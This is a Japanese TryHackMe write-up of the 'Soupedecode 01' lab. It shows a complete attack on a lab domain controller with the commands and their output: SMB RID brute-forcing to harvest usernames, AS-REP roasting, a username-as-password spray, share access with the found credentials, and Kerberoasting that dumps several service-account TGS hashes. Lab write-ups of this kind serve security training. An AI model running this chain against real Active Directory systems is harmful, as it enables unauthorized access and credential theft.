はじめに
本記事は、TryHackMeのwriteupです。
Roomは、Soupedecode 01、Difficulty(難易度)はEasyです。
このRoomでは、Active Directory環境におけるドメインコントローラーを侵害するためのケルベロス認証、ナビゲーションSMBパスワード共有、パスワードスプレー攻撃、パスザハッシュ攻撃などの基本的な攻撃について学ぶことができます。
Recon
Port Scan
Scanned at 2026-05-08 23:51:40 JST for 106s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-05-08 14:51:48Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.SOUPEDECODE.LOCAL
| Issuer: commonName=DC01.SOUPEDECODE.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-07T14:48:35
| Not valid after: 2026-11-06T14:48:35
| MD5: 07c9 2b41 e2b3 6ae7 c045 ad39 c274 2853
| SHA-1: d63a 829c da41 84dd fc39 6be3 1179 0c04 9a0e 8a76
| SHA-256: 50a9 eb61 09f2 6cf3 6bda 4097 d52e a8bd 3d9d c61b 4885 5844 2b5a 9216 68fc e0a2
| -----BEGIN CERTIFICATE-----
| MIIC8DCCAdigAwIBAgIQc9mMJ3lItpNMrImPd2sA+TANBgkqhkiG9w0BAQsFADAh
| MR8wHQYDVQQDExZEQzAxLlNPVVBFREVDT0RFLkxPQ0FMMB4XDTI2MDUwNzE0NDgz
| NVoXDTI2MTEwNjE0NDgzNVowITEfMB0GA1UEAxMWREMwMS5TT1VQRURFQ09ERS5M
| T0NBTDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJ7CWx7YUACSHIuy
| 1qprXEght0YEjgV6aUXZJNUptEXgEdp+VtcI6vE2Zxuoasc09I/adFB/d9gTTwuS
| TqOe5M1PbMVMQUJ3oQE5yC29IlOwW1hv6BFHqHBx4+ATukJ1/PkDepR4MEGMphyt
| BpYZ9eciF2aefpLXcBe/NIJknEjOU8qRzlKEuKfKYa2XW8K+7snLYwbS1WLuk8iS
| vipyCjQ6Cx3TlWLYqv49syf4b/biAUollzrTaQtOWa5+v3O/9dHuYvdt3I2AFaCi
| 95vLR7VTtOFF23zGgZKr7cDKe6azWFW9a489JSDZCc7VxdQrF+DgNt9sBnTwoRoi
| IaOQEjECAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQw
| MA0GCSqGSIb3DQEBCwUAA4IBAQAFkjBKi0gqhYsozUjfppNf3lCSg42AjgjU8bUG
| crL/Hbbwrrt92s4jf+xuQ+YBcrRTVb9GHEknuCDEp2nNukXhG3CtjPBohivBW555
| zJdcllc8iyUrjUDMG7nd+Vnn6BjA2yXqn2UiIHa6nT70/tkzW+LKh/LMUgxwN6Jv
| a9nqmf7q3uUiMehX4Q3jViX0/2nthW5cPifcRufjABIJPiIW2syrGzQoO/OzXom/
| 0UBcvgx6IcI10jjvpUVJ+mv/ZIFyVnHG3KEa0yI/IpkOXbv3smH+9DJgbM7BNo/e
| udNSoTj4RnExB8d2xuTmkuZY9GC0CXWYOxHjtl6SQJQCrLs4
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: SOUPEDECODE
| NetBIOS_Domain_Name: SOUPEDECODE
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SOUPEDECODE.LOCAL
| DNS_Computer_Name: DC01.SOUPEDECODE.LOCAL
| Product_Version: 10.0.20348
|_ System_Time: 2026-05-08T14:52:39+00:00
|_ssl-date: 2026-05-08T14:53:19+00:00; +1s from scanner time.
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49739/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24271/tcp): CLEAN (Timeout)
| Check 2 (port 22534/tcp): CLEAN (Timeout)
| Check 3 (port 39411/udp): CLEAN (Timeout)
| Check 4 (port 43906/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-05-08T14:52:42
|_ start_date: N/A
上記のポートスキャン結果から調査します。
enum4linux
┌──(rikuxx㉿kali)-[~]
└─$ enum4linux [target_ip]
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May 9 00:30:06 2026
=========================================( Target Information )=========================================
Target ........... [target_ip]
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on [target_ip] )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for [target_ip] )===============================
Looking up status of [target_ip]
No reply from [target_ip]
===================================( Session Check on [target_ip] )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
特に無さそうです。
etc/hostsに以下を追加します。
[target_ip] SOUPEDECODE.LOCAL
Scanning
とりあえず、Sambaがどうなっているかを見てみましょう。
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "" -p "" --shares
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\: STATUS_ACCESS_DENIED
SMB [target_ip] 445 DC01 [-] Error enumerating shares: Error occurs while reading from remote(104)
Samba存在していることがわかります。
ユーザー名guestを利用して、共有フォルダがあるか調べます。
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "guest" -p "" --shares
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
SMB [target_ip] 445 DC01 ADMIN$ Remote Admin
SMB [target_ip] 445 DC01 backup
SMB [target_ip] 445 DC01 C$ Default share
SMB [target_ip] 445 DC01 IPC$ READ Remote IPC
SMB [target_ip] 445 DC01 NETLOGON Logon server share
SMB [target_ip] 445 DC01 SYSVOL Logon server share
SMB [target_ip] 445 DC01 Users
共有フォルダをパスワード空文字でも閲覧できることがわかります。
まず、共有フォルダであるUsersについて調べます。
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "guest" -p "" --shares "Users"
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
何もありません。
また、backupについても調べます。
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u "guest" -p "" --shares "backup"
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
ここにも何もありません。
また、LDAPも調査します。
┌──(rikuxx㉿kali)-[~]
└─$ nxc ldap [target_ip]
LDAP [target_ip] 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAPが存在していることが確認できます。
ユーザー名guestでパスワードが空文字で何かある調査します。
┌──(rikuxx㉿kali)-[~]
└─$ nxc ldap [target_ip] -u "guest" -p "" --users
LDAP [target_ip] 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP [target_ip] 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP [target_ip] 389 DC01 [+] SOUPEDECODE.LOCAL\guest:
LDAP [target_ip] 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
エラーになってしまい、接続に失敗しました。
ldapsearchでも調査します。
┌──(rikuxx㉿kali)-[~]
└─$ ldapsearch -H ldap://[target_ip] -x -b "dc=SOUPEDECODE,dc=LOCAL"
# extended LDIF
#
# LDAPv3
# base <dc=SOUPEDECODE,dc=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
これでもダメそうです。
Exploitation
ここで、Sambaを利用し、RIDに対して総当たり攻撃をしてユーザーリストを取得できるか試みます。
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u 'guest' -p '' --rid-brute
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\guest:
SMB [target_ip] 445 DC01 498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB [target_ip] 445 DC01 500: SOUPEDECODE\Administrator (SidTypeUser)
SMB [target_ip] 445 DC01 501: SOUPEDECODE\Guest (SidTypeUser)
SMB [target_ip] 445 DC01 502: SOUPEDECODE\krbtgt (SidTypeUser)
SMB [target_ip] 445 DC01 512: SOUPEDECODE\Domain Admins (SidTypeGroup)
SMB [target_ip] 445 DC01 513: SOUPEDECODE\Domain Users (SidTypeGroup)
.....
.....
SMB [target_ip] 445 DC01 2164: SOUPEDECODE\backup_svc (SidTypeUser)
SMB [target_ip] 445 DC01 2165: SOUPEDECODE\web_svc (SidTypeUser)
SMB [target_ip] 445 DC01 2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
SMB [target_ip] 445 DC01 2168: SOUPEDECODE\admin (SidTypeUser)
するとなんと、2100個ほどのユーザー名を収集することに成功しました。
実際にusers.txtというユーザーリストファイルを作成します。
┌──(rikuxx㉿kali)-[~]
└─$ nxc smb [target_ip] -u 'guest' -p '' --rid-brute | grep -oP 'SOUPEDECODE\\\K[^ ]+' | sed 's/(.*//' > users.txt
users.txtを使用し、AS-REP Roasting攻撃で、TGTが発行されないかを確かめます。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/ -usersfile users.txt -format hashcat -outputfile hashes.asrep -dc-ip [target_ip]
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
.....
.....
[-] User web_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
どうやら、チケットを抜けなそうです。
Sambaに対して、全通りで同一のユーザ名をパスワードにしているかを検証します。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ nxc smb [target_ip] -u users.txt -p users.txt --continue-on-success
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise (Guest)
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Enterprise STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:Enterprise STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:Enterprise STATUS_LOGON_FAILURE
....
.....
ただ、これでは全て検証するのに半日以上かかってしまいます。
以下のwriteupを参考にしたところ、全パターンは無理ゲーだそうです。
そこで、ブルートフォース攻撃で同一のユーザ名をパスワードにしているかだけを検証します。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ nxc smb soupdecode.local -u users.txt -p users.txt --no-brute --continue-on-success
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\Enterprise:Enterprise (Guest)
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\Domain:Domain (Guest)
.....
.....
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\zfrank28:zfrank28 STATUS_LOGON_FAILURE
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\[USERNAME]:[LEAKED_PASSWORD]
SMB [target_ip] 445 DC01 [-] SOUPEDECODE.LOCAL\file_svc:file_svc STATUS_LOGON_FAILURE
.....
.....
すると、同一のユーザー名でパスワードが使用されているアカウントを特定することに成功しました。
特定したユーザー名、パスワードを用いて、共有フォルダが閲覧可能かを調べます。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ nxc smb soupdecode.local -u [USERNAME] -p [LEAKED_PASSWORD] --shares
SMB [target_ip] 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB [target_ip] 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB [target_ip] 445 DC01 [*] Enumerated shares
SMB [target_ip] 445 DC01 Share Permissions Remark
SMB [target_ip] 445 DC01 ----- ----------- ------
SMB [target_ip] 445 DC01 ADMIN$ Remote Admin
SMB [target_ip] 445 DC01 backup
SMB [target_ip] 445 DC01 C$ Default share
SMB [target_ip] 445 DC01 IPC$ READ Remote IPC
SMB [target_ip] 445 DC01 NETLOGON READ Logon server share
SMB [target_ip] 445 DC01 SYSVOL READ Logon server share
SMB [target_ip] 445 DC01 Users READ
共有フォルダを閲覧することに成功しました。
smbclientを用いて、backup、Usersにアクセスします。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //[target_ip]/backup -U '[USERNAME]%[LEAKED_PASSWORD]'
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //[target_ip]/Users -U '[USERNAME]%[LEAKED_PASSWORD]'
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Jul 5 07:48:22 2024
.. DHS 0 Sun May 10 00:21:06 2026
admin D 0 Fri Jul 5 07:49:01 2024
Administrator D 0 Sun May 10 00:30:48 2026
All Users DHSrn 0 Sat May 8 17:26:16 2021
Default DHR 0 Sun Jun 16 11:51:08 2024
Default User DHSrn 0 Sat May 8 17:26:16 2021
desktop.ini AHS 174 Sat May 8 17:14:03 2021
Public DR 0 Sun Jun 16 02:54:32 2024
[USERNAME] D 0 Tue Jun 18 02:24:32 2024
12942591 blocks of size 4096. 10704500 blocks available
smb: \>
なんと、Usersの中に、[USERNAME]が使用している個人フォルダが共有されていることに気づきます。
\[USERNAME]\Desktop\に移ると、user.txtがあり、フラグを取得することができます。
smb: \[USERNAME]\Desktop\> dir
. DR 0 Sat Jul 26 02:51:44 2025
.. D 0 Tue Jun 18 02:24:32 2024
desktop.ini AHS 282 Tue Jun 18 02:24:32 2024
user.txt A 33 Sat Jul 26 02:51:44 2025
12942591 blocks of size 4096. 10704500 blocks available
smb: \[USERNAME]\Desktop\> mget user.txt
.....
.....
What is the user flag?
Answer: XXXXXXXXXXXXXXXXXX
Privilege Escalation
また、特定したアカウント情報からAS-REP Roasting攻撃により、TGTチケットを発行しないかを検証します。
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-GetUserSPNs SOUPEDECODE.LOCAL/[USERNAME]:[LEAKED_PASSWORD] -dc-ip [target_ip] -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-18 02:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-18 02:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-18 02:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-18 02:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-18 02:29:18.511871 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$25f7cb6a8070bdc7fc98827cc15144e7$07cc6ff839578695d7edf0cc5b1d5ca204a78b8deea4762848b4d5c8125c1b733d2eb03528449388e6f42e87eeffec7e7fe034e6cc3e243ca319f09aa9ad87ebe9017f7555769a45f3f15a5c024842416cbce3087223f5a7e5d775e9246345cb22ae1b7074a277a18dd701939dc84b6bf6279e56afeeee6ded5fcf1f0c920c716a9a8ff4c36c3b43654d4021fa8b5caed6396a38e3e09f8c23053de2f34c5e2bcacf8bc16889aa75fb78115ab08b8c44ae2c3d5b873781ad403ccf102e8a472f60e4bf039cbb34b16b15fda9bb795b42e23e14251f537fb4cab312d95dad3bfdd6a6c56b1cbceeb7a36efc0f8efcc713f870d71577135e48d4fe3781b90294d4f100a35af155a902e35b6b7387bb3e1ebc2de04c63571e534c4a1d36cc275c71e5c841997fb926921ce8b5ade88d9501496457842a9aec674f9b3a39e8ce3aa4223c5e9c9f6e6f1e273d04070dd3dd836feac32a085f3e7bb877e7a87e919f9f7a87d0d593c427bcb053e465a481731625bcf92771d95b7e5c2e29f6a83c4adbbc4d5ff1f17428954deb1b3f77423029fc42f8e23df364381ad6d0ee518a5a15bb1faca7ab82d4e2f9fb271fb9283f77ccb149a23f3448cc1de590510d8b8cd9a4cf82a889d02fcf3422a78c305eb555c5ef0804dfbeafcbff310e69168ac69f9533efba447aaba66f786a510d34be437b1479996450776fa1cc6eaa7ae3c832df5f0af8d7c417a8191d3eb78d7bc6230da8b3baaa19110cbbe430929639ec41a36dcbeabd0d601292b22ee29024926a91076ce64705c3cdd2abf3707b6086ee814abc9d756369b8d346159de960b7cba5a0f2b89408cd1b4128628244bd1575b688b39ab19fd32b2b269a45d43a295d115411aa0d8e78be72ff8cc414cad18449787c08b89ac372e5330b4efe2f61b2a7c4cf78ee8e7cba8a52230716baa33c972552717eb44fb51d2ffb22a4826648a74ca95158c33e58143b3f71bd9cdfc87d86b0b031c94e40aaefe5ad8ceeb0f20f2792500c3938197fdac85c492f2e0d62c14917de986a8b05905fe37a419ff83ed380300198540cd9a279723582d1dc26bc61c45ac2bc75d13d83a7aab17de8a63828394b829de87da1d80d32866a54e46ad6bb90cd6093c5340fde97ee7e3ff597c1682c6185effd1d96849e960eaaf08463e051d95acdb186aa3fba61ba246afe8e66c169cec7d661af9b33bf601e45d34a3610ca4007d9cebdf51beeaa236e97a0281d3f0837061448421b02813297b0666a7234af2db33ed0864f17c8b48b966f3d5608ed188c0bde45ddac09d58ffeefca9968c1cb613a955efa165251299e124ad42818de6b200a605f76c0ee64af3407a5502ec82919898af0d4f7afed1bc35e1b834763a4c5ce7ffac83ba77e17142049597bb6efb5dd6d31dbca2f8351c75d1bc4bb90046bd6f6f3bfcbd64c67d46640dc2b1fdf6c518e7f653d946aa96dda47d27f37e72d4494c55575c35d
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/firewall_svc*$b0ac0d531e0a00d02bd27dd86a90ccd7$474b43cfaa198d2d4703bd007ab8a8d9db3532397f95cfdaf17076604305429c781fd60bb591e99e8a10743dae59454115a10f8a81df5bc8a77b3254f43f65718045c12ff65aa22ba2fba0c17a65eeb088348a276e13e5a10982c1bdd90dbccc020bea3441b42a17372c4f00ac50c93751ddb7bef0bbfaa87bf6dd7abff6b93678823fd6038abde26d64333dafd9e8f2923c20796e55669cb98e1d04b234e98d1147cc211fcc7d5497598648d71d93a7899a23bfaaabcb460bf8d5dc8aa338a1051e22d27d78bccd04a8f4ae7c6a1fc2e1baa84931bd86b0c440ebc50f71b923ad6352cb7ed73cd7904dd4858fc70f6c826d1aa23f2fd304ec5c95c183e48780925ce74a27a6738547436f6c761b7c4978b068c756bc57e6ffa361f3ff635e6467924f8717b0958608ba778d1485772b7c1860ca8cea21b01ec74ca9db78922fe1d7590fb592a634e28a7d58693e479b25381eb42698841d3944ae9bc412c9d97e5d0e29df8b191123fef711367b1e69efd31910fba7fc4f38699126fb63ba2da725cbccbb5fb65f5a9763b854d7fb6aa7d787ab8b3d25f45bc9b156719020be546ff476c9f8b2c1cc889bec83981c1c8bbdf2c086e602b6b643c4d5f5ac4673ebed463fb550c4a0bbd28c5fec214a4395a0774e64e4056a14b86f8c08a3dc6357acdce294c11318c04d3112a2768a6ba4ea949259f0532f6f47dcfc5be7b47b2045fa730c71b24797e7646062f1a17c4cfcdf45a0248d2b07945bb7bd560616f7a403dd84be4317221f6159a28b214909ae2a70bcf5b1af7250ad6db9c9da29ce8df28a586cad7f6ba2c23db3bbc00a6769bee7424f9de4b4d09f750f13a14ed26b7347ddb5871e152451833064cb709e6cb6d9458baa52a5e8f29c4b121a6d7dd66492eaaa139f1c3d4b6f14fcac2c1b8da2c673388ac03c37294b712921972b28a4f6b0186d16e60c53fac503e606d47176834a879ada3e327f7cfefb74eea9ccd010c486206ddb6b3ae406f80c7973342eb6c04c8facad4d20e1b0594c538f9622fce6e305fc317a1613533fa79da4c7e5876dc95bf3e2c1987f349432b2966e84f0e4432fa2e680816a97093639e0a49c1614bd3b1e7c0b676b5044fe185578eb3249b21b20555f37a5788b80dff3c6ff1c34762e090eed27a6b1755b22fe346dc5b8a43141ee42e978e871ce17122ca1a4dbc1f6b84c8d919c8f31c4832867814870fd0a602e246782c6ddb78c2e262141b8f3ae468746920c864fe225cf9aa28b8bcb16cb3dbef7848d169b3ea0da7d24501c5c56ccad3fadc8c5caf05ce344552eff79a9de4f32986dbbc2cdf1b8ee010778eac57b51ebf07d9e782cefb9c6f9f422b4af076592ac3b188e9482893a5fb33d5922a1a7d9a54f037a62afca55fbc6093af7bb10b5c7a73a00ba9fd1f1a7129e7f3f8cf35bd21e5ec9e9f861f0f7311788d6d53a0eae6757ad2a75405822add4803897e434e599d5cd52cc
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/backup_svc*$58b9811c2f4f2eacfca27aa142d5b4d4$7f0b82a7837e02ec9eacad8b895f89d0fd07deba08f300d82cec03017ba1a7fe770259c148139f7535c10c292d31399687f0fd889ec86463ffd77c680f700c271669d79e3e09e796a20c2b9dec2b44d0827ca2a5dd63267e734c4e8a20cc160bb5e98f612144815db9a136f6e609300f5d325ac0cc6e96159da721b41ebbb57c7b8fe97011ce4495a77fc77ac3da11c9c95def9468d467119124e97ed906efc6359a4d67fed13313c25de54d3a4815113d651719210dcc2f4619d88adc4f5983144c849d7b21b37dca7345b86e08578fc8602a0497d8e36876f6b57468c5655e7b1c2eec6f696de851d7e0a8aea1506fded3b77dcfad887df33e0dbcf19f969d004a66d41f67f0743816b43bd90b6445edee0ed181a06aab1fe89aebbc7b173d231a35452da2c1e497fd9ae7a28151f7c8449a27397fe5668be55a9539af336a37ba857d7dc935d7911d9d5fcd20b68930b393d4f1e9ce83b6534f74abfc370c8ed6fd2948c35e283ddc95a4bb39559b9fbc0aea53586d6fc916f6c0b00d468b9c895054ea8061e87bf3d9807413186b305db7b5437ac3457d38dd2dea75871c801cfa18fead81f7e8226d523d98caf31263542c6031cd6dee19fcef8bad56fabff6ad67ab85540dd74eeee40396293dd2027e0d84764753ee4bd8598d1f20cf1ea63891c01e2d7f97e44e408e54ebd79f2fefc1974f95a69ace9c9c3361805f4b012077732b19f8134191e4350a07b9021ee18388f3916b8eec83bc9c870e4cbc36556e5e29feb83576d6a708591ded24762b6ae0a1dcdaff2c4c541eac31663e642f44a117a5ea21abd1d8a80b6155ae9045db8c91741da970114ed26ef579c4897eeb52861cbe87e778f78eb321cec457266fe6a0e390c9b095256b59fcbae729d875d9ddf6067a1adb6a9d2da062b6955cf3d019b0cc3df438c8374257c43c45b46290ff7d2ff4e0ec8342d5e595f12ecaeff55f94b88df41312feb899bd11b73c4100210e068b32dc2569c724fc295627f3106c35a8fb4f49f43439fc7b878b9bf253d426ef3c9f2af046372f94a8ea4ddba5871d1870029b030d70d4a0d5361954335c0fce6d1668cef4d2f00cff6cd32756d96236cb0646428b74011ae9008dca875eb204667deaddda2a640f5c1ab2bc286d6e674d24fc18430c86f9c90e80dd1498e5570542b843dd52ba0200189d195182f6a4eee37d7a88344c88446a5cf81f2642aca79f95132d9ea34c3177fd5dd1829c6e4c1b93c9c381d189dbf029b9a27cdcb4eff7cf76ae8372ae2b75d05a1964d07e469bf6c25a6ada5574d53b15875f6d6790007485fcc8f359b59d4798f0df6596b5d90a321ab1b4f436a6d0a27f96fb08be4eba6a6a036673e9541f6f0bbc68dd47d25e971548ccfbc47f37909e62c15da543208a0d2d0b8491fd7ae20b53bfc341de1b0cbd7bd9f2c0c977945a13119d231e364ddf64579a514fe06256ab2a9f611e079f10a6e4df45
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/web_svc*$71f4d7cbe0632e1a0c27725720c53b11$c3b28e920a76c0c6a7d050aa6540c186b239f1a7bdcc01bafa1f863cbb294e7ae5254f0c9d452b5a595ed34e3928c5d41245678d8c002bd4fdd57594252d6dbbc9982afa7cbea0d25b53cc3dd6f1826e8ab025a35a730466ed54d1d563485a386a8223883dc935bca77b4e7463f7a53d1384d20931d3f017df36c003d3d9e63f8c1147044e4083c9039bd57c0e741b9bfd69837649042fd26920b503d1cbb7ad704621e186fa0733ae797f1ff53f6f28baa99232cce5919d0473124ebdc7e3a41b9d440e1c293b8d82c00ecbc1eabd6cfa28807fbb9473c4c785678acb885bf09d1180b3000884abf0dca5d7f391042de5927914d793cc363d81f1607e8b9a5d9de4a3dae590e5f53297fd0ef5efb39147b7897c47decb4b7ce47b735fadf3f26ca7757ae72bfad5d4db1589770ca1e3ca722cd9c746a41e6c7834c7e828f6b315808d6531edb09c33daba386a0ad326eed62679e916ef322e41871b69b28006b223c474bf1adf385ce74c5548d6e82a666ea26d728ef2b3e63cc35fa717a55076472810c6215faced6042cfeab506c75f5c85340c2a190de0e8fa488ae8eb17a2cddf41d212e65113d7862e8d39fbeac56388c2655802076fc303b8b68c29a6d7207cdbb3d80213e85e27b776a2a40140377ef7c534065b8a44f2a3b39a1f283597d3989c3afe505a8e15f3df9ac84c5a9bc380c30a122a1a937805678e33e086a1eb5778610e20c70c343a9a833e8d8d54566db913e7b0076968af2ad689668099e7e0a7d9e66a46f70900c9584da8c3e7e1f6dc544d0cfec0c15586014f054245b869929422f8bd01edeafbb32d7659f0053dfcf53e0f95a1c5a84641c3d0f29ab0f85a77bdb4ada478d788cbd08ab5f85c42ec6fead4870431d451588707391a7d4af2bf97c6b84773baaa4f9875455892c93af5b7d635982581e93ee13ded9069bf31d6f15f86dadac2f7287c9ad067122c8b3d60667b1dd40db076bfa95d11c9b2bf5d